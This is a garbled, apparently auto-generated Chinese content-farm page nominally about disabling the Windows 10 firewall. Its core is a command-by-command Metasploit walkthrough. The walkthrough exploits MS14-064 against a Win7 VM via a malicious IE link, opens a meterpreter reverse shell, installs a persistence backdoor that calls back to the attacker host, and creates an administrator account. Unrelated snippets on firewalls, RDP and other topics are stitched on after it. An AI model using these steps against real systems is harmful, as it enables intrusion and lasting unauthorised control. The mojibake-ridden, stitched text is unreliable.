win10虛擬機(jī)如何關(guān)閉防火墻
在VMware上建立兩個(gè)虛擬機(jī):win7和kali。
Kali:它是Linux發(fā)行版的操作系統(tǒng),它擁有超過300個(gè)滲透測(cè)試工具,就不用自己再去找安裝包,去安裝到我們自己的電腦上了,畢竟自己從網(wǎng)上找到,也不安全。它甚至還集成了600多種黑客工具,很強(qiáng)大。
可以永久免費(fèi)使用,基本上學(xué)黑客攻擊必會(huì)用到這個(gè)系統(tǒng)。
靶機(jī):Win7 64位 (IP: 192.168.10.45)--用ipconfig進(jìn)行查詢。
攻擊機(jī):Kali (IP:192.168.10.21)--用ifconfig進(jìn)行查詢。
1、實(shí)驗(yàn)環(huán)境前提條件【一一幫助安全學(xué)習(xí),所有資源關(guān)注我,私信回復(fù)“資料”獲取一一】
①網(wǎng)絡(luò)安全學(xué)習(xí)路線
②20份滲透測(cè)試電子書
③安全攻防357頁(yè)筆記
④50份安全攻防面試指南
⑤安全紅隊(duì)滲透工具包
⑥網(wǎng)絡(luò)安全必備書籍
⑦100個(gè)漏洞實(shí)戰(zhàn)案例
⑧安全大廠內(nèi)部視頻資源
⑨歷年CTF奪旗賽題解析
win7中,關(guān)閉防火墻(“打開網(wǎng)絡(luò)和共享中心”-“Windows防火墻”-“打開或關(guān)閉Windows防火墻”-均選擇關(guān)閉選項(xiàng))。
保證兩個(gè)虛擬機(jī)是可以ping通的(尤其是在kali中去ping win7,看能否連通)。
$ping 192.168.10.45
2、打開Metasploit滲透工具Metasploit是一款開源的安全漏洞檢測(cè)工具,msfconsole用于啟動(dòng)msf終端:
>msfconsole
**結(jié)果:**成功進(jìn)入,進(jìn)入到"msf6>“的模式下
3、查看需要利用的漏洞搜索漏洞,編號(hào)為MS14-064。
MS14-064為Windows OLE自動(dòng)化陣列遠(yuǎn)程代碼執(zhí)行漏洞。當(dāng)IE不作訪問內(nèi)存中的對(duì)象時(shí),存在遠(yuǎn)程代碼執(zhí)行漏洞。OLE(對(duì)象鏈接與嵌入)是一種允許應(yīng)用程序共享數(shù)據(jù)和功能的技術(shù),遠(yuǎn)程攻擊者利用此漏洞通過構(gòu)造的網(wǎng)站執(zhí)行任意代碼,用戶使用IE瀏覽器查看該網(wǎng)站時(shí)允許遠(yuǎn)程執(zhí)行代碼。
【補(bǔ)充:Windows系統(tǒng)漏洞微軟的漏洞編號(hào)命名格式為:MS14-064;
MS Micosoft的縮寫,固定格式;
14 表示年份,即2014年發(fā)布的漏洞;
064 表示順序,即當(dāng)年度發(fā)布的第64個(gè)漏洞。
>search ms14-064
**結(jié)果:**可以看到返回了多條可利用的漏洞模塊信息
4、嘗試?yán)闷渲幸粋€(gè)漏洞模塊進(jìn)行攻擊利用其中一個(gè)漏洞攻擊模塊-0模塊,進(jìn)行攻擊,進(jìn)入模塊中(注意:必須是“_”,不是“-”,否則會(huì)報(bào)錯(cuò))。
>use exploit/windows/browser/ms14_064_ole_code_execution
**結(jié)果:**成功切換到這個(gè)模塊之下--”msf6 exploit(windows/browser/ms14_064_ole_code_execution)>“
并提示“no payload configured,defaulting to windows/meterpreter/reverse_tcp”--沒有配置payload,默認(rèn)為 windows/meterpreter/reverse_tcp
5、查看該漏洞模塊所需的參數(shù)情況進(jìn)到這個(gè)漏洞模塊之后,先查看該測(cè)試模塊的參數(shù)情況。類似于你使用一軟件,進(jìn)行攻擊,是不是需要先進(jìn)行一些簡(jiǎn)單的參數(shù)配置啊,需要告訴軟件,要向誰發(fā)起攻擊吧,這是最最基本的,所以,要配置,就要先查看都可以配置哪些參數(shù)。
>show options
**結(jié)果:**其中required顯示的值為yes的,代表是必須要設(shè)置的項(xiàng);顯示的值為no的,代表是不必須要設(shè)置的項(xiàng);
重點(diǎn)關(guān)注6個(gè)參數(shù)配置,需要設(shè)置哪個(gè)就設(shè)置哪個(gè):
Payload (攻擊載體-使用默認(rèn)的windows/meterpreter/reverse_tcp即可) ;
SRVHOST (文件共享服務(wù)器-kali地址);
SRVPORT (文件共享服務(wù)器的端口-使用默認(rèn)獲取的端口即可);
LHOST (發(fā)起攻擊的地址-kali地址);
LPORT (發(fā)起攻擊的端口-使用默認(rèn)獲取的端口即可);
AllowPowershellPrompt (開啟瀏覽器插件,默認(rèn)為false)
【補(bǔ)充說明:
1)Payload中包含有需要在遠(yuǎn)程系統(tǒng)中運(yùn)行的惡意代碼,Payload是一種特殊模塊,它們能夠以漏洞利用模塊運(yùn)行,并能夠利用目標(biāo)系統(tǒng)中的安全漏洞實(shí)施攻擊。也就是說,漏洞利用模塊可以訪問目標(biāo)系統(tǒng),而其中的代碼定義了Payload在目標(biāo)系統(tǒng)中的行為。
2)Payload模塊主要有以下三種類型:-Single -Stager -Stage
Single是一種完全獨(dú)立的Payload,實(shí)現(xiàn)的目的也簡(jiǎn)單,但容易被捕捉到。
Stager這種Payload負(fù)責(zé)建立目標(biāo)用戶與攻擊者之間的網(wǎng)絡(luò)連接,并下載額外的組件或應(yīng)用程序。 一種常見的Stagers Payload就是reverse_tcp,它可以讓目標(biāo)系統(tǒng)與攻擊者建立一條tcp連接(3次握手-4次揮手)(是一個(gè)基于TCP的反向鏈接反彈shell, 使用起來很穩(wěn)定)。
Stage是Stager Payload下載的一種Payload組件,這種Payload可以提供更加高級(jí)的功能,而且沒有大小限制。
3)windows/x64/meterpreter/reverse_tcp則由一個(gè)Stager Payload(reverse_tcp)和一個(gè)Stage Payload(meterpreter)組成。
注意:Payload為windows/meterpreter/reverse_tcp 默認(rèn)獲取到的控制通道m(xù)eterpreter為32位,
如果想將之后獲取到的控制通道m(xù)eterpreter改為64位,則設(shè)置。payload:windows/x64/meterpreter/reverse_tcp
6、設(shè)置文件共享服務(wù)器發(fā)現(xiàn)SRVHOST為空,待設(shè)置,其它(payload/SRVPORT/LHOST/LPORT)均已獲取,且正確,設(shè)置SRVHOST的對(duì)應(yīng)的參數(shù)地址,它指的是文件共享服務(wù)器的地址,想一想,要設(shè)成誰?為什么?
分析一下:是在哪里用到這個(gè)文件共享服務(wù)器?是不是會(huì)在生成一個(gè)網(wǎng)址,誘導(dǎo)用戶點(diǎn)擊了,就會(huì)直接連接到發(fā)起攻擊的主機(jī)上。那你們覺得應(yīng)該是誰生成這個(gè)連接呢?是用戶那邊么?還是攻擊者這邊?肯定是攻擊者這邊吧,我們是不知道會(huì)有誰點(diǎn)了這個(gè)網(wǎng)站鏈接吧。
所以,我們才會(huì)對(duì)這個(gè)文件共享服務(wù)器的地址設(shè)置為kali的地址
>set SRVHOST 192.168.10.217、開啟瀏覽器插件
要把AllowPowershellPrompt的默認(rèn)參數(shù)false改為true,因?yàn)閙sf中自帶的漏洞是利用exp調(diào)用的是powershell(powershell是一種命令外殼程序和腳本環(huán)境),所以msf的exp代碼只對(duì)安裝了powershell的系統(tǒng)生效。
>set AllowPowershellPrompt true8、再次進(jìn)行檢查
查看對(duì)SRVHOST和AllowPowershellPrompt進(jìn)行的修改,是否修改成功
>show options9、檢查無誤后,發(fā)起攻擊
>run
**結(jié)果:**生成一個(gè)網(wǎng)站的鏈接“Using URL : http://192.168.10.21:8080/xE6RxjSy,開啟服務(wù),光標(biāo)停留在這,等待有人點(diǎn)擊該網(wǎng)站鏈接。
10、打開網(wǎng)站鏈接到win7中,在IE瀏覽器中打開網(wǎng)站鏈接: http://192.168.10.21:8080/xE6RxjSy,會(huì)提示是否允許打開一個(gè)文件,選擇“允許”之后,即可觸發(fā)會(huì)話連接。
**結(jié)果1:**在win7中打開鏈接后,不會(huì)有任何的反饋結(jié)果。
**結(jié)果2:**由于在win7中觸發(fā)打開了網(wǎng)址鏈接,那么,在kali中,則會(huì)觸發(fā)會(huì)話連接,結(jié)果顯示了是192.168.10.45(目標(biāo)主機(jī)win7)嘗試點(diǎn)擊了該網(wǎng)站鏈接,于是,kali利用MS14-064漏洞模塊對(duì)目標(biāo)主機(jī)發(fā)起了攻擊,最終,“meterpreter session 1 opened”--表明已經(jīng)開通192.168.10.21:4444和192.168.10.45:49191會(huì)話連接1。
一般會(huì)自動(dòng)進(jìn)入控制通道m(xù)eterpreter,交互模式,表明攻擊成功。
注意:
一旦開通一個(gè)會(huì)話連接后,若系統(tǒng)沒有自動(dòng)進(jìn)入控制通道,則可以嘗試回車,進(jìn)行手動(dòng)連接。
1)手動(dòng)查看當(dāng)前存在的會(huì)話
注意在目錄msf>下,手動(dòng)查看當(dāng)前存在的會(huì)話。
**結(jié)果:**當(dāng)前只有會(huì)話連接1,meterpreter建立的連接類型type是x86–32位的(由模塊中的payload設(shè)定),以及展示目標(biāo)主機(jī)192.168.10.45的基本信息和連接信息。
>sessions
2)選擇連接當(dāng)前已經(jīng)開通的會(huì)話1
>sessions -i 1
**結(jié)果:**成功進(jìn)入控制通道m(xù)eterpreter,交互模式,表明攻擊成功。
11、植入后門程序在kali控制win7后,通過persistence,在目標(biāo)主機(jī)上生成一個(gè)后門程序,以便后續(xù)不再通過MS14-064漏洞進(jìn)行二次入侵,而是通過這個(gè)后門文件來入侵該主機(jī)【注意在控制通道m(xù)eterpreter>下】。
注意:因?yàn)檫@個(gè)MS14-064漏洞很容易被修復(fù),一旦目標(biāo)主機(jī)進(jìn)行定期修補(bǔ)漏洞,那么通過MS14-064漏洞進(jìn)行入侵的路徑,就會(huì)失效,但植入的后門程序是不容易被發(fā)現(xiàn)和修復(fù)的,所以一旦入侵成功后,建議嘗試植入后門程序。
通過persistence(支持多種方式啟動(dòng))植入固定的后門程序,設(shè)置相關(guān)參數(shù),設(shè)置回連地址和端口號(hào)。
>run persistence -S -U -X -i 5 -p 40000 -r 192.168.10.21
重點(diǎn)關(guān)注6個(gè)參數(shù)配置:
-S:系統(tǒng)啟動(dòng)時(shí)自動(dòng)加載本程序(因?yàn)樵摵箝T程序是不能被目標(biāo)用戶發(fā)現(xiàn),更不需要讓目標(biāo)主機(jī)進(jìn)行點(diǎn)
擊啟動(dòng)的,所以需要該程序有自動(dòng)加載的功能);
-U:用戶登陸時(shí)自動(dòng)加載本程序;
-X:開機(jī)時(shí)自動(dòng)加載本程序;
-i: 自動(dòng)加載后,回連的時(shí)間間隔,即后門每隔多少秒嘗試連接回連地址;
-r: 自動(dòng)加載后,回連的主機(jī)地址,回連到誰啊,自然是入侵的kali的地址;
-p:自動(dòng)加載后,回連的端口號(hào),即kali地址的端口號(hào),理論上可隨意設(shè)置,但范圍不要超過65535,且
不可設(shè)置為常見的特殊的端口號(hào);
**結(jié)果1:**在kali中提示,成功生成一個(gè)后門程序yqLAOjt.vbs,自動(dòng)加載后會(huì)回連到192.168.10.21:40000,并保存于目標(biāo)主機(jī)win7中的C:\Users\18044\AppData\Local\Temp\目錄下。
【**注意:**payload自動(dòng)設(shè)置為“windows/meterpreter/reverse_tcp”,LHOST設(shè)置為192.168.10.21,LPORT設(shè)置為40000】
**結(jié)果2:**在win7中的C:\Users\18044\AppData\Local\Temp\目錄下,成功找到從攻擊主機(jī)kali植入的后門程序yqLAOjt.vbs
【補(bǔ)充知識(shí)點(diǎn):
1)端口號(hào)范圍:0~65535
2)常見端口號(hào)列舉
12、掛起當(dāng)前會(huì)話在成功植入后門程序后,我們還需要對(duì)該后門程序進(jìn)行驗(yàn)證,驗(yàn)證是否可以通過該后門程序成功入侵目標(biāo)主機(jī)win7,所以可先將當(dāng)前通過MS14-064漏洞開啟的會(huì)話連接掛起(background)或斷開(exit),均可
meterpreter>background
**結(jié)果:**成功將session會(huì)話1掛起到后臺(tái),并沒有斷開連接,且成功切換到msf >目錄下
13、開啟監(jiān)聽模塊利用后門程序進(jìn)行攻擊,需要打開一個(gè)監(jiān)聽模塊,能夠反彈shell監(jiān)聽模塊,進(jìn)行攻擊,進(jìn)入模塊中
>use exploit/multi/handler
**結(jié)果:**成功切換到這個(gè)模塊之下--”msf6 exploit(multi/handler)>“
并提示“Using configured payload generic/shell_reverse_tcp”--使用的payload為generic/shell_reverse_tcp
14、查看該監(jiān)聽模塊所需的參數(shù)情況進(jìn)到這個(gè)監(jiān)聽模塊之后,先查看該模塊的參數(shù)情況。類似于你使用一軟件,進(jìn)行攻擊,是不是需要先進(jìn)行一些簡(jiǎn)單的參數(shù)配置啊,需要告訴軟件,要向誰發(fā)起攻擊吧,這是最最基本的,所以,要配置,就要先查看都可以配置哪些參數(shù)?
>show options
**結(jié)果:**其中required顯示的值為yes的,代表是必須要設(shè)置的項(xiàng);顯示的值為no的,代表是不必須要設(shè)置的項(xiàng);
重點(diǎn)關(guān)注3個(gè)參數(shù)配置,需要設(shè)置哪個(gè)就設(shè)置哪個(gè):
15、設(shè)置攻擊載體、回連地址以及端口號(hào)Payload:攻擊載體;
LHOST:回連地址;
LPORT:回連端口號(hào);
因?yàn)槲覀円_啟的這個(gè)監(jiān)聽模塊,是專門針對(duì)于yqLAOjt.vbs后門程序,進(jìn)行實(shí)時(shí)監(jiān)聽,那么,必然需要將監(jiān)聽模塊的參數(shù)配置,與yqLAOjt.vbs后門程序的參數(shù)配置保持一致,只有這樣,才能達(dá)到準(zhǔn)確的監(jiān)聽
之前制作yqLAOjt.vbs的參數(shù)為:
"run persistence -S -U -X -i 5 -p 40000 -r 192.168.10.21"
因此,我們也就需要將監(jiān)聽模塊的攻擊載體Payload,與后門程序的payload保持一致:
>set payload windows/meterpreter/reverse_tcp
需要將監(jiān)聽模塊的回連地址LHOST,與后門程序的LHOST保持一致:
>set LHOST 192.168.10.21
需要將監(jiān)聽模塊的回連地址的端口號(hào)LPORT,與后門程序的LPORT保持一致:
>set LPORT 4000016、再次進(jìn)行檢查
>show options17、檢查無誤后,發(fā)起攻擊
>run
**結(jié)果:**開啟針對(duì)192.168.10.21:40000的監(jiān)聽模式,因?yàn)閥qLAOjt.vbs后門程序已經(jīng)設(shè)置了自動(dòng)加載,所以一旦開啟監(jiān)聽模塊,立即會(huì)有反饋信息回連到192.168.10.21:40000上來。
最終,“meterpreter session 2 opened”--表明已經(jīng)開通192.168.10.21:40000和192.168.10.45:49227的會(huì)話連接2。
一般會(huì)自動(dòng)進(jìn)入控制通道m(xù)eterpreter,交互模式,表明攻擊成功。
【注意:
此時(shí),將當(dāng)前開啟的會(huì)話進(jìn)行掛起操作–background,再查看當(dāng)前已存在的會(huì)話–sessions,結(jié)果會(huì)得到已開啟兩個(gè)會(huì)話連接信息,要對(duì)這兩個(gè)會(huì)話連接進(jìn)行區(qū)分,分清楚,第一個(gè)會(huì)話連接是通過MS14-064漏洞開啟的,第二個(gè)會(huì)話連接是通過后門程序開啟的
18、創(chuàng)建用戶、設(shè)置密碼1)拿到shell權(quán)限,獲得控制臺(tái)權(quán)限,可以獲取系統(tǒng)的控制臺(tái)C:\Windows\system32
meterpreter>shell
2)進(jìn)入后,可能會(huì)有亂碼的情況,解決亂碼問題
C:\Windows\system32>chcp 65001
3)顯示win7系統(tǒng)中所有的用戶
C:\Windows\system32>net user
4)創(chuàng)建用戶
創(chuàng)建用戶,用戶名為test,密碼為test【net user 用戶名 密碼 /add】
C:\Windows\system32>net user test test /add
也可以不設(shè)置密碼,只創(chuàng)建用戶名為test1的無密碼用戶【net user 用戶名 /add】
C:\Windows\system32>net user test1 /add
**結(jié)果1:**在kali中,若結(jié)果顯示“the commad completed successfully”—代表“命令執(zhí)行成功” ,用戶創(chuàng)建成功 ;
若結(jié)果顯示“system error 5 has occurred;access is denied”—“發(fā)生系統(tǒng)錯(cuò)誤5; 拒絕訪問”-----代表權(quán)限不夠的問題,需要**進(jìn)行提權(quán),可以利用bypassuac或者Windows內(nèi)核漏洞進(jìn)行提權(quán)
**結(jié)果2:**在win7中,”控制面板“—”添加或刪除用戶賬戶“,查看成功新建的用戶test(標(biāo)準(zhǔn)用戶–密碼保護(hù))、test1(標(biāo)準(zhǔn)用戶–無密碼)
5)將新用戶添加到administrator分組–提升到管理員權(quán)限【net localgroup administrators 用戶名 /add】
C:\Windows\system32>net localgroup adminis trators test1 /add
**結(jié)果1:**在kali中,顯示“the commad completed successfully”—代表“命令執(zhí)行成功” ,成功添加到administrator分組,提升管理員權(quán)限成功 ;
**結(jié)果2:**在win7中,”控制面板“—”添加或刪除用戶賬戶“,查看新建的用戶test1用戶由之前的”標(biāo)準(zhǔn)用戶“提升至”管理員“,提升權(quán)限成功。
這是水淼·dedeCMS站群文章更新器的試用版本更新的文章,故有此標(biāo)記(2023-10-27 08:34:26)
windows10怎么關(guān)閉445端口
1. 打開“控制面板”,選擇“系統(tǒng)和安全”。2. 點(diǎn)擊“Windows Defender防火墻”。3. 選擇“高級(jí)設(shè)置”。4. 在左側(cè)的面板中,選擇“入站規(guī)則”。5. 在右側(cè)的面板中,找到“文件和打印機(jī)共享(SMB-In)”。6. 右鍵單擊該規(guī)則,選擇“禁用規(guī)則”。完成以上步驟后,445端口就會(huì)被關(guān)閉。此時(shí),如果有...
電腦軟路由器怎么設(shè)置怎么設(shè)置愛快軟路由
不過我個(gè)人建議,如果只是測(cè)試玩下ROS,這么做還可以,如果為了省錢而用虛擬機(jī)路由的話,玩PC1的人會(huì)很痛苦的,雖然VM虛擬個(gè)ROS給個(gè)64M內(nèi)存都能出效果,不過玩上兩小時(shí)左右消耗的CPU資源會(huì)給你一種玩得想死的感覺現(xiàn)在都60元路由爛大街的時(shí)代,舍不得孩子套不著狼。‘伍’ 如何設(shè)置軟路由配置很簡(jiǎn)單,先打開DHCP服務(wù)端...
...page華碩筆記本W(wǎng)in10藍(lán)屏終止代碼PAGEFAULTINNONPAGEDAREA怎樣...
3、禁用所有即時(shí)掃描文件的軟件, 如殺毒軟件、防火墻或備份工具。4、病毒引起的,建議您可以使用騰訊電腦管家殺毒軟件,全面的查殺病毒,徹底的清理干凈 D. 華碩筆記本,Win10藍(lán)屏,終止代碼PAGE FAULT IN NONPAGED AREA怎樣解決 一般會(huì)在以下兩種情況下發(fā)生藍(lán)屏: 系統(tǒng)更新后 使用過程中 系統(tǒng)更新后發(fā)生藍(lán)屏: PS:一般出現(xiàn)...
win10系統(tǒng)遠(yuǎn)端桌面連線不上win7可以怎么解決
win10系統(tǒng)遠(yuǎn)端桌面連線不上win7可以怎么解決 具體方法如下: 1、遠(yuǎn)端桌面連過去報(bào)如下錯(cuò)誤,反正就是連線不上遠(yuǎn)端桌面的埠,系統(tǒng)和裝置肯定是好的,從虛擬機(jī)器管理器連上。 2、檢查配置,發(fā)現(xiàn)該機(jī)器的網(wǎng)路位置變成了公用,在win10防火墻設(shè)定;專用網(wǎng)路是未連線,而公用網(wǎng)路是有1個(gè)活動(dòng)連線。 3、wi...
win7來賓安全模式
(6)在控制面板--Windows 防火墻--高級(jí)設(shè)置--入站規(guī)則--新建規(guī)則(7)選擇端口--協(xié)議和端口--TCP\/特定本地端口:同上的端口(8)下一步,選擇允許連接(9)下一步,選擇公用(10)下一步,名稱:遠(yuǎn)程桌面-新(TCP-In),描述:用于遠(yuǎn)程桌面服務(wù)的入站規(guī)則,以允許RDP通信。[TCP 同上的端口](11)刪除遠(yuǎn)程桌面(TCP-In)...
win7如何關(guān)閉139窗口
如果你的電腦是通過老式的COM、現(xiàn)在流行的USB數(shù)據(jù)線直接連接到打印機(jī),或者是通過打印機(jī)的ip直接連接,那你的電腦將不會(huì)受到影響,打印機(jī)服務(wù)依然可以正常使用。關(guān)閉方法方式:windows批處理腳本運(yùn)行環(huán)境:win7系統(tǒng)、win10系統(tǒng)步驟演示(以win7系統(tǒng)為例,演示圖片請(qǐng)放大查看!)查詢135 137 138 139 445端...
怎樣關(guān)掉autium designer 中file in newer format
先關(guān)閉殺毒軟件及防火墻。在虛擬光驅(qū)加載下載來的 ISO 文件,打開 虛擬光驅(qū)對(duì)應(yīng)的盤符,如下圖,運(yùn)行 AltiumInstaller.exe。啟動(dòng)程序安裝畫面。卸載的時(shí)候不能在控制面板中卸載,也是到這個(gè)目錄下運(yùn)行“AltiumUninstaller.exe”點(diǎn)擊“Next”進(jìn)入下一步 選擇語(yǔ)言“Chinese”,勾上“I accept the agreement”,...
連接遠(yuǎn)程桌面時(shí)提示無法登錄怎么辦win10
1、遠(yuǎn)程桌面連過去報(bào)如下錯(cuò)誤,反正就是連接不上遠(yuǎn)程桌面的端口,系統(tǒng)和設(shè)備肯定是好的,我從虛擬機(jī)管理器連上杠杠的。2、知道原因處理就快了,打開控制面板--網(wǎng)絡(luò)與internet--網(wǎng)格共享中心,發(fā)現(xiàn)在win10下網(wǎng)絡(luò)位置和win7完全不一樣,是不能直接修改的。3、在網(wǎng)絡(luò)菜單到處亂試,終于試到了一個(gè)辦法,...
麒麟電腦安裝dns如何在電腦上設(shè)置dns
當(dāng)您配置 DNS 和防火墻時(shí),這些問題都有可能發(fā)生。 ❷ 麒麟系統(tǒng)怎么安裝 1.首先用光盤引導(dǎo)系統(tǒng),,出現(xiàn)GRUB引導(dǎo)器,直接回車 2.等一會(huì)選擇安裝介質(zhì),由于我們示用虛擬機(jī)裝的ISO鏡像,所以選擇CDROM。 3.這里選擇是否檢測(cè)安裝光盤的完整性,會(huì)很慢,所以選擇skip跳過。 4.在這里選擇安裝方式,即以圖形界面安裝還是文本...
Win10電腦不能遠(yuǎn)程桌面控制怎么辦
遠(yuǎn)程桌面連過去報(bào)如下錯(cuò)誤,反正就是連接不上遠(yuǎn)程桌面的端口,系統(tǒng)和設(shè)備肯定是好的,我從虛擬機(jī)管理器連上杠杠的。網(wǎng)管的兄弟賭咒說沒調(diào)整過安全策略,只好自身查原因了,小編仔細(xì)看了配置,突然發(fā)現(xiàn)該機(jī)器的網(wǎng)絡(luò)位置變成了公用,在win10防火墻設(shè)置;專用網(wǎng)絡(luò)是未連接,而公用網(wǎng)絡(luò)是有1個(gè)活動(dòng)連接。win10...
相關(guān)評(píng)說:
天心區(qū)沉孔: ______ windows10中關(guān)閉或者啟用防火墻方法 1、右鍵點(diǎn)擊開始菜單 2、在右鍵菜單中選擇“控制面板”(也可以通過其他方式打開控制面板) 3、在控制面板中,選擇查看方式為大圖標(biāo),或者小圖標(biāo) 4、選擇“windows 防火墻” 5、在右邊的菜單中選擇“啟用或者關(guān)閉windows防火墻” 6、在彈出的界面中,選擇“關(guān)閉windows防火墻” 注意事項(xiàng) 如非必要,不要關(guān)閉防火墻,以免系統(tǒng)受攻擊或者感染病毒
天心區(qū)沉孔: ______ win10開啟和關(guān)閉防火墻方法: 工具: win10正式版系統(tǒng) 1.首先右擊"網(wǎng)絡(luò)"圖標(biāo),在單擊“屬性”. 2.單擊”windows防火墻". 3.在單擊“打開或關(guān)閉windows防火墻". 4.選擇關(guān)閉windows防火墻. 以上就是win10關(guān)閉防火墻的方法. 同樣是啟用防火墻方法. 注:防火墻能有效阻止惡意網(wǎng)站和病毒,謹(jǐn)慎使用.
天心區(qū)沉孔: ______ 步驟 1、 關(guān)閉Win10系統(tǒng)的防火墻 1、右鍵點(diǎn)擊開始菜單按鈕,選擇控制面板; 2、在控制面板中依次打開 【系統(tǒng)和安全】——》【W(wǎng)indows防火墻】——》【啟用或關(guān)閉Windows防火墻】; 3、分別設(shè)置專用網(wǎng)絡(luò)和公用網(wǎng)絡(luò)的防火墻為關(guān)閉,然...
天心區(qū)沉孔: ______ 1、首先在Win10桌面找到“網(wǎng)絡(luò)”圖標(biāo),然后在其上鼠標(biāo)右鍵,在彈出的右鍵菜單中,點(diǎn)擊進(jìn)入“屬性”, 2、在打開的網(wǎng)絡(luò)和共享中心界面的左下角就可以找到“Windows防火墻”設(shè)置選項(xiàng),點(diǎn)擊進(jìn)入 3、打開Windows防火墻設(shè)置后,就可以進(jìn)行“啟用或關(guān)閉Windows防火墻”、“還原默認(rèn)”、“高級(jí)設(shè)置”等操作,如果要關(guān)閉防火墻,則點(diǎn)擊進(jìn)入“啟用或關(guān)閉Windows防火墻”選項(xiàng) 4、最后只需要將網(wǎng)絡(luò)設(shè)置選擇為“關(guān)閉Windows防火墻(不推薦)”,然后點(diǎn)擊底部的“確定”保存設(shè)置就可以了. 以上就是關(guān)閉Win10防火墻方法,如果后期需要開啟,同樣進(jìn)入上面的第四步,進(jìn)行開啟就可以了.
天心區(qū)沉孔: ______ 點(diǎn)擊任務(wù)欄上的網(wǎng)絡(luò)圖標(biāo)——網(wǎng)絡(luò)設(shè)置——windows防火墻——啟用或關(guān)閉windows防火墻——在右邊關(guān)閉——確定:
天心區(qū)沉孔: ______ 工具:電腦,WIN10 方法步驟: 1,打開控制面板. 2,點(diǎn)擊[Windows防火墻]. 3,進(jìn)入防火墻設(shè)置頁(yè)面點(diǎn)擊[啟用或關(guān)閉Windows防火墻]. 4,如下圖,選擇“關(guān)閉windows防火墻(不推薦)”點(diǎn)擊確認(rèn)即可完成操作.
天心區(qū)沉孔: ______ 可參考以下步驟關(guān)閉windows 10中的windows defender: 1、點(diǎn)擊開始--設(shè)置--更新與安全; 2、點(diǎn)擊左側(cè)的 Windows Defender 一欄; 3、然后在 Windows Defender 的設(shè)置界面里,點(diǎn)擊關(guān)閉“實(shí)時(shí)保護(hù)”選項(xiàng)即可.
天心區(qū)沉孔: ______ 1、首先右擊"網(wǎng)絡(luò)"圖標(biāo),在單擊“屬性”. 2、單擊”windows防火墻". 3、在單擊“啟用或關(guān)閉windows防火墻". 4 4、選擇”關(guān)windows防火墻(不推薦).在單擊“確定就可以完成了.
天心區(qū)沉孔: ______ 步驟1、 關(guān)閉Win10系統(tǒng)的防火墻1、右鍵點(diǎn)擊開始菜單按鈕,選擇控制面板;2、在控制面板中依次打開 【系統(tǒng)和安全】——》【W(wǎng)indows防火墻】——》【啟用或關(guān)閉Windows防火墻】;3、分別設(shè)置專用網(wǎng)絡(luò)和公用網(wǎng)絡(luò)的防火墻為關(guān)閉,然后...
天心區(qū)沉孔: ______ 點(diǎn)擊任務(wù)欄上的網(wǎng)絡(luò)圖標(biāo)——網(wǎng)絡(luò)設(shè)置——windows防火墻——啟用或關(guān)閉windows防火墻——在右邊關(guān)閉——確定: